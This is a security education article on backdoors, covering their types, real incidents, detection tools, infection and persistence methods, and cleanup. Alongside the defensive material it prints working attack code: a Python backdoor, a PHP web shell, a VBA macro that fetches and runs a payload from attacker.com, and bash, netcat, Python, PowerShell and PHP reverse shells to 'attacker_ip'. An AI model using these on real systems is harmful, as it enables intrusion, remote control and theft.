We value your privacy

We use cookies to enhance your browsing experience and analyze traffic anonymously for internal statistical purposes. By clicking “Accept all,” you consent to the use of cookies.

Tech Deep Dive

Backdoors and hidden attacks

Understand what a backdoor is, its types, how it works, and how to safely detect and remove it from infected computers or websites.

4 July 2025

Table of contents

  • What is a backdoor?
  • Types of backdoors
  • How to detect backdoors and their functionalities
  • How attackers use backdoors
  • Reverse shell: a real attack scenario
  • How to remove a backdoor from a computer or infected site

Backdoors are among the most insidious and difficult threats to detect. These malicious mechanisms allow attackers to gain unauthorized access to compromised systems by bypassing authentication, firewalls, and access controls.

This article explores what backdoors are, their most common forms, how they spread, how they work, and – most importantly – how to detect and safely remove them. We will also look at a practical example: the use of a reverse shell, one of the most widely used backdoor techniques.

What is a backdoor?

In cyber security, a backdoor is a hidden access point that allows attackers to control a computer system by bypassing normal authentication and security checks.

A backdoor may be intentionally implemented by a developer or secretly injected by a hacker.

Legitimate vs malicious backdoors

  • Legitimate
    Sometimes added for remote tech support, troubleshooting, or recovery. For instance, some consumer routers have ISP-installed backdoors for remote configuration.
  • Malicious
    Installed through malware, phishing, or exploits to grant unauthorized remote access to an attacker.

How it works

A backdoor may be active (constantly communicating) or dormant, waiting for specific commands. Typically, it enables attackers to:

  • Execute remote shell commands
  • Upload/download files
  • Deploy additional malware
  • Log user activity
  • Exfiltrate sensitive data

Practical Python example: basic backdoor

Here’s a very basic Python backdoor that connects to a remote server and waits for instructions:

import socket

import subprocess

host = "attacker_ip"

port = 4444

s = socket.socket()

s.connect((host, port))

while True:

    command = s.recv(1024).decode()

    if command.lower() == "exit":

        break

    output = subprocess.getoutput(command)

    s.send(output.encode())

s.close()

This would be executed on the victim’s machine. The attacker simply sets up a listener using netcat:

nc -lvp 4444

The attacker can now send system commands directly to the victim’s terminal – a classic reverse shell scenario.

Real-world example: Juniper backdoor (2015)

In 2015, a backdoor was discovered in Juniper Networks’ ScreenOS firewalls, allowing attackers to decrypt VPN traffic if they knew a secret key.

This backdoor had been deliberately inserted into the firmware. The incident highlighted how software backdoors can compromise even trusted network infrastructure without the user’s knowledge.

Types of backdoors

Backdoors come in many forms, ranging from simple hidden scripts to complex firmware implants. Understanding the various types of backdoors is essential for defending systems effectively.

1. Software backdoors

These are hidden functions embedded into otherwise legitimate applications. Often installed via:

  • Trojan horses
    Disguised as harmless programs.
  • Modified open-source software
    Attackers insert malicious code into public projects.

Example:

In 2020, a backdoor in the phpass project altered the CheckPassword() function to always return true if a specific password was used – granting admin access to attackers.

2. Botnet backdoors

Botnets are networks of infected devices controlled via remote commands. Each device runs a backdoor client connecting to a command and control (C&C) server.

Features:

  • Uses HTTP, IRC, or custom P2P for communication.
  • Frequently auto-update themselves.
  • Used for DDoS, spam, mining, data theft.

Example:

Mirai botnet exploited default IoT credentials to install a backdoor that reported to a C&C server. It was used in massive DDoS attacks, reaching over 1 Tbps.

3. Rootkits

Rootkits are low-level backdoors that hide their presence using system-level tricks. They can operate in:

  • User-mode
    Relatively easier to detect and remove.
  • Kernel-mode
    Harder to detect, more dangerous.

Common method:

They intercept system calls to hide processes, files, and sockets.

Tools for detection:

  • rkhunter (Linux)
  • GMER (Windows)
  • Chkrootkit

4. Hardware / firmware backdoors

These are the most persistent. Introduced during manufacturing or via malicious firmware updates, they’re very hard to remove or detect.

Example:

The 2018 Supermicro espionage allegation claimed that Chinese-made spy chips were embedded in servers sold to major U.S. companies. Though unconfirmed, it triggered concern over hardware-level backdoors.

5. Network backdoors

Found in routers, switches, or firewalls, these allow attackers to manipulate or monitor network traffic. They can exist as hidden services or backdoored firmware.

Example:

Certain Huawei routers sold abroad were found with hardcoded login credentials, accessible via telnet or SSH – effectively hidden network backdoors.

6. Web-based backdoors (PHP/ASP/JS)

Used for remote control of compromised websites. These are files that allow you to:

  • Upload/execute code
  • Read/modify files
  • Access the database

Example of a PHP web shell:

<?php

if(isset($_REQUEST['cmd'])){

  echo "<pre>";

  $cmd = ($_REQUEST['cmd']);

  system($cmd);

  echo "</pre>";

}

?>

This can be accessed with:
http://victim.com/shell.php?cmd=ls

How to detect backdoors and their functionalities

Detecting a backdoor is often challenging due to stealth techniques like obfuscation, privilege escalation, or encrypted communications.

However, several tools and strategies can help identify suspicious behavior, connections, and persistence methods.

1. Network traffic analysis

Backdoors often communicate with external C2 servers on non-standard ports.

Tools:

  • Wireshark
    Real-time packet capture.
  • tcpdump
    Command-line traffic analysis.
  • Zeek
    Advanced network monitoring.
  • Suricata
    NIDS with custom detection rules.

Example using tcpdump:

tcpdump -i eth0 port not 22 and port not 80

Filters out standard SSH and HTTP traffic to expose unusual communication.

2. Process inspection

A running backdoor often maintains unfamiliar processes, without descriptions, or masquerading as system processes (svchost, systemd, rogue explorer.exe).

Tools:

  • Process Explorer (Windows)
  • htop / ps aux (Linux)
  • Activity Monitor or lsof (macOS)

Example:

ps aux | grep -v root | grep -E 'nc|bash|perl|python|sh'

Detects suspicious shells launched by non-root users.

3. Port scanning and hidden listeners

Many backdoors listen on non-standard TCP/UDP ports.

Command:

netstat -tulnp | grep LISTEN

On Windows:

netstat -ano | findstr LISTENING

Or use CurrPorts for a GUI-based view.

4. System and autostart inspection

Backdoors can be persistent through modifications in the following files:

  • Init system (systemd, rc.local, cron)
  • Windows registry (e.g. HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
  • Login scripts

Tools:

  • Autoruns (Windows)
  • systemctl / crontab -l (Linux)

Example (Linux):

crontab -l

ls /etc/systemd/system/

Identifies unexpected cron jobs or custom service files.

5. Behavior-based detection

EDR platforms monitor system behavior for signs of compromise, like privilege escalation or data exfiltration.

Free/open-source EDR tools:

  • OSSEC
  • Wazuh
  • CrowdSec

6. Indicators of Compromise (IoC)

These are digital footprints left by an attacker, including:

  • Known malicious IPs/domains
  • File hashes (SHA256, MD5)
  • Abnormal user agents or login patterns

Useful tools:

  • YARA (pattern-based detection)
  • VirusTotal
  • MISP – Threat intelligence platform

7. Reverse engineering and sandboxing

Unknown binaries or scripts can be executed in a sandbox environment to observe behavior.

  • Cuckoo Sandbox
  • Any.Run
  • Hybrid Analysis
Software vulnerabilities

How attackers use backdoors

Backdoors are not only malware but a technique used for long-term system compromise.

They are often part of a broader kill chain involving initial access, privilege escalation, and persistence.

1. Common infection vectors

a) Phishing and spear-phishing

A classic method. A crafted email with a malicious attachment executes VBA macros to fetch a PowerShell-based backdoor.

Example: VBA macro payload

Sub AutoOpen()

    Dim obj As Object

    Set obj = CreateObject("Wscript.Shell")

    obj.Run "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/backdoor.ps1')"

End Sub

b) Exploiting software vulnerabilities

Backdoors are installed via flaws in web apps or services.

Example
CVE-2021-26855 (Microsoft Exchange) allowed attackers to upload ASPX web shells and persist.

c) Drive-by downloads

By visiting a malicious website, users unknowingly trigger scripts that exploit the browser or plugins to install backdoors.

d) Supply chain compromise

Backdoors are injected into legitimate software during build or update.

Example
The SolarWinds attack – the Orion software update included a trojanized DLL used for espionage.

2. Installation and persistence techniques

Once access is achieved, attackers aim to stay hidden and maintain access:

  • Modify Windows Registry startup entries
  • Create new services/daemons
  • Insert cron/systemd jobs
  • Replace system binaries
  • Inject into legitimate processes (DLL injection, hollowing)

PowerShell example: registry persistence

Set-ItemProperty -Path “HKCU:\Software\Microsoft\Windows\CurrentVersion\Run” -Name “Updater” -Value “C:\Users\victim\AppData\Roaming\backdoor.ps1”

3. Command & Control (C2) communications

Backdoors often phone home to a C&C server using encrypted, stealthy channels.

Techniques:

  • Reverse shells
  • HTTPS callbacks
  • DNS tunneling
  • Telegram or Discord bots

Bash reverse shell example:

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

4. Defense evasion

To avoid detection, backdoors:

  • Obfuscate code and payloads
  • Encrypt communication
  • Disable antivirus or EDR
  • Mimic legitimate software (e.g., svch0st.exe)

5. Lateral movement and privilege escalation

Once inside, attackers move across systems, steal credentials, and elevate access.

Common tools:

  • Mimikatz
    Extracts passwords/hashes from memory
  • PsExec
    Executes commands remotely
  • BloodHound
    Maps Active Directory privilege escalation paths

Reverse shell: a real attack scenario

One of the most popular techniques for maintaining backdoor access is using a reverse shell. It enables an attacker to gain remote terminal access to a compromised system, bypassing firewalls and NAT protections.

What is a reverse shell?

In a reverse shell, the victim’s machine initiates an outbound TCP connection to the attacker. Once connected, the victim’s terminal (bash, cmd, PowerShell) is redirected to the attacker’s console, allowing full remote control.

Scenario: attack using netcat

1. Attacker opens a listener

nc -lvp 4444

Netcat listens for incoming connections on port 4444.

2. Victim executes reverse shell

nc attacker_ip 4444 -e /bin/bash

The attacker can now type:

id

uname -a

cat /etc/passwd

Note:

NoOn modern systems, the -e option is disabled for security reasons. Alternatively, you can use:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attacker_ip 4444 > /tmp/f

Reverse shell in Python

import socket, subprocess, os

s = socket.socket()

s.connect(("attacker_ip", 4444))

os.dup2(s.fileno(), 0)

os.dup2(s.fileno(), 1)

os.dup2(s.fileno(), 2)

subprocess.call(["/bin/sh", "-i"])

This shell is useful in Linux/Unix environments with Python installed.

PowerShell reverse shell (Windows)

$client = New-Object System.Net.Sockets.TCPClient("attacker_ip",4444)

$stream = $client.GetStream()

[byte[]]$bytes = 0..65535|%{0}

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){

 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);

 $sendback = (iex $data 2>&1 | Out-String );

 $sendback2 = $sendback + "PS " + (pwd).Path + "> ";

 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);

 $stream.Write($sendbyte,0,$sendbyte.Length);

 $stream.Flush()

}

PHP reverse shell (for compromised websites)

<?php

$sock=fsockopen("attacker_ip",4444);

$proc=proc_open("/bin/sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

?>

Upload this to a WordPress site and trigger it via browser to activate the shell.

What does the traffic look like?

From a network analyst’s perspective, a reverse shell can look like:

  • An outgoing connection from a machine that should not connect to the outside.
  • Non-standard destination port (e.g. 4444, 1337, 9001)
  • No User-Agent, raw TCP protocol

Example with tcpdump:

tcpdump -i eth0 port 4444

Reveals suspicious outbound traffic from internal machines.

Evasion techniques

  • Encrypted channels (e.g., HTTPS or TLS shells)
  • DNS tunneling
  • Using proxies/TOR
  • Base64 or XOR obfuscation

Countermeasures

  • Monitor egress traffic on uncommon ports
  • Disable PowerShell macros and VBA scripts
  • Deploy EDR solutions
  • Use firewall “deny all” policies
  • Implement file integrity monitoring on web servers

How to remove a backdoor from a computer or infected site

Removing a backdoor is one of the most critical steps in responding to a cyber attack. The goal is not only to eliminate the malicious code, but also to ensure that:

  1. The attacker can no longer re-enter the system.
  2. All infection vectors are closed.
  3. The system is effectively monitored post-remediation.

Let’s look at the steps in detail for computers and websites.

A. Computer (Windows, Linux, macOS)

1. Isolate the infected machine

Disconnect it from all networks.

sudo ip link set eth0 down

2. Boot in Safe Mode or Live USB

Perform the analysis from a clean environment.

3. Run antivirus/malware scans

Tools:

  • Malwarebytes
  • ClamAV
  • ESET
  • Kaspersky Rescue Disk

clamscan -r /home/ –bell -i

4. Analyze processes and ports

ps aux

netstat -tulnp

On Windows:

tasklist

netstat -ano

5. Check startup files

  • Windows: use Autoruns
  • Linux: check crontab, systemd, /etc/init.d

6. Manually remove malicious files

sudo rm /path/to/file

7. Reset all passwords

Local and online (email, cloud, VPN, CMS, FTP).

8. System integrity check

Compare hashes, use:

  • Tripwire
  • AIDE

9. Restore from a clean backup

Format and reinstall if needed.

10. Post-cleanup monitoring

Deploy EDR or host-based intrusion detection (OSSEC, Wazuh).

B. Website remediation (WordPress, Joomla, etc.)

1. Take the site offline

Prevent further damage and user infection.

2. Access via FTP/SFTP or SSH

Navigate to /public_html/ or /var/www/html.

3. Search for suspicious code

Look for obfuscated PHP or JS:

grep -r “eval(base64” .

4. Check themes, plugins, CMS core

  • Delete unused plugins
  • Reinstall CMS core files
  • Compare MD5/SHA with official files

5. Scan using security tools

  • Wordfence
  • Sucuri
  • Quttera

6. Restore from a clean backup

If the breach is severe.

7. Reset credentials

Change all:

  • FTP
  • Hosting
  • Database
  • Admin logins

8. Update everything

CMS, plugins, PHP, database engine.

9. Deploy a Web Application Firewall

Examples:

  • Cloudflare WAF
  • Astra Security
  • ModSecurity

10. Ongoing monitoring

Set up alerts for:

  • File changes
  • Suspicious logins
  • DNS modifications

Questions and answers

  1. What is a backdoor in cyber security?
    A hidden access mechanism allowing attackers to bypass authentication and control a system remotely.
  2. What are the main types of backdoors?
    Botnets, rootkits, trojans, reverse shells, and application-level backdoors.
  3. How is a backdoor typically installed?
    Via phishing, trojans, software vulnerabilities, or social engineering.
  4. Are all backdoors malicious?
    No. Some are created by developers for support purposes, but they pose a risk if exploited.
  5. Why are rootkits dangerous?
    They operate deep within the OS, often undetectable by standard antivirus tools.
  6. What is a reverse shell?
    A connection initiated by the victim to the attacker, allowing remote command execution.
  7. How can I tell if my system has a backdoor?
    Look for abnormal behavior, unexpected processes, and unusual network activity.
  8. Can I remove a backdoor without reinstalling the OS?
    Yes, but it requires advanced tools, analysis, and often restoring clean backups.
  9. Can WordPress sites get infected with backdoors?
    Absolutely – often through vulnerable plugins or themes.
  10. Which tools are best to detect backdoors?
    Wireshark, chkrootkit, rkhunter, Autoruns, Malwarebytes, Wordfence, ClamAV.
4
To top